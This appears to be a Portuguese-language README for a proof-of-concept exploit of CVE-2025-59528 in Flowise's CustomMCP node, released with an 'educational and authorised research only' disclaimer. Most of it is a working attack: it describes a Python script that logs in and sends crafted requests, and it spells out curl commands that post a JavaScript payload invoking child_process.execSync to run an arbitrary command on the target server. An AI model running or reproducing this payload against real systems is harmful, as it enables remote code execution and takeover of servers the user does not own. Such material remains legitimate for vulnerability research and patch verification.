
CVE-2025-59528 Prova de Conceito
Script de prova de conceito em Python para acionar o caminho RCE CustomMCP do Flowise via POST /api/v1/node-load-method/customMCP.
⚠️ Apenas para fins educacionais e pesquisa de segurança autorizada. Executar esta ferramenta contra sistemas que você não possui ou sem permissão por escrito para testar é ilegal.
im-soohyun (Kim SooHyun)CVE-2025-595283.0.53.0.6poc.py: solicita a URL/IP da máquina, protocolo opcional quando apenas host/IP for informado, e-mail, senha e comando; faz login, reutiliza cookies e envia uma solicitação personalizada, exibindo o status HTTP, cabeçalhos e corpo da resposta de forma semelhante ao CustomMCPcurl -iExecute:
python3 poc.py
Em seguida, forneça:
10.10.11.10, http://10.10.11.10 ou https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'